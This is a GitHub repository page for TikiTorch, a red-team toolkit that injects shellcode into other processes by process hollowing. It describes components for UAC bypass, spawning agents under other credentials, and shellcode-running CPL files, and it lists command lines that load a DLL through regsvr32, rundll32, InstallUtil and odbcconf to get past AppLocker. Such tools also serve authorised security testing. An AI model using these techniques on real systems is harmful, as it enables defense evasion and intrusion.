Skip to content
Process Hollowing
Branch: master
Clone or download
Latest commit f60e22e Apr 14, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
TikiCpl Add GZip decompression to TikiLoader Mar 26, 2019
TikiLoader LoadAsSystem Apr 14, 2019
TikiSpawn Add GZip decompression to TikiLoader Mar 26, 2019
TikiSpawnAs New Assemblies Mar 20, 2019
TikiSpawnElevated Update README.md Mar 25, 2019
TikiThings Use Loader.GetShellcode Mar 26, 2019
.gitattributes Initial commit Feb 19, 2019
.gitignore
Get-CompressedShellcode.ps1
LICENSE
README.md
TikiTorch.sln

README.md

  *   )           )         *   )                        )  
` )  /(   (    ( /(   (   ` )  /(         (           ( /(  
 ( )(_))  )\   )\())  )\   ( )(_))   (    )(     (    )\()) 
(_(_())  ((_) ((_)\  ((_) (_(_())    )\  (()\    )\  ((_)\  
|_   _|   (_) | |(_)  (_) |_   _|   ((_)  ((_)  ((_) | |(_) 
  | |     | | | / /   | |   | |    / _ \ | '_| / _|  | ' \  
  |_|     |_| |_\_\   |_|   |_|    \___/ |_|   \__|  |_||_| 

Intro

TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process, then uses CreateRemoteThread to run the desired shellcode within that target process. Both the process and shellcode are specified by the user.

This is pretty flexible as it allows an operator to run an HTTP agent in a process such as iexplore.exe, rather than something more arbitrary like rundll32.exe.

TikiTorch follows the same concept but uses Process Hollowing techniques instead of CRT.

Usage

TikiTorch is a Visual Basic solution, split into 6 projects.

  • TikiLoader
  • TikiSpawn
  • TikiSpawnAs
  • TikiSpawnElevated
  • TikiCpl
  • TikiThings

TikiLoader

A .NET Library that contains all the process hollowing code, used as a reference by the other Tiki projects.

TikiSpawn

A .NET Library designed to bootstrap an agent via some initial delivery, can be used with DotNetToJScript in conjunction with lolbins.

TikiSpawnAs

A .NET exe used to spawn agents under different creds.

> TikiSpawnAs.exe
  -d, --domain=VALUE         Domain (defaults to local machine)
  -u, --username=VALUE       Username
  -p, --password=VALUE       Password
  -b, --binary=VALUE         Binary to spawn & hollow
  -h, -?, --help             Show this help

TikiSpawnElevated

A .NET exe used to spawn a high integrity agent using the UAC Token Duplication bypass.

> TikiSpawnElevated.exe
  -b, --binary=VALUE         Binary to spawn & hollow
  -p, --pid=VALUE            Elevated PID to impersonate (optional)
  -h, -?, --help             Show this help

TikiCpl

Generates a Control Panel (.cpl) formatted DLL that executes gzipped base64 encoded shellcode from a resource. Following the instructions here to generate shellcode in the correct format.

TikiThings

A DLL that integrates AppLocker bypasses from AllTheThings.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U TikiThings.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U TikiThings.dll
regsvr32 /s /u TikiThings.dll
regsvr32 /s TikiThings.dll
rundll32 TikiThings.dll,EntryPoint
odbcconf /s /a { REGSVR TikiThings.dll }
regsvr32 /s /n /i:"blah" TikiThings.dll

Credits

Further Reading

You can’t perform that action at this time.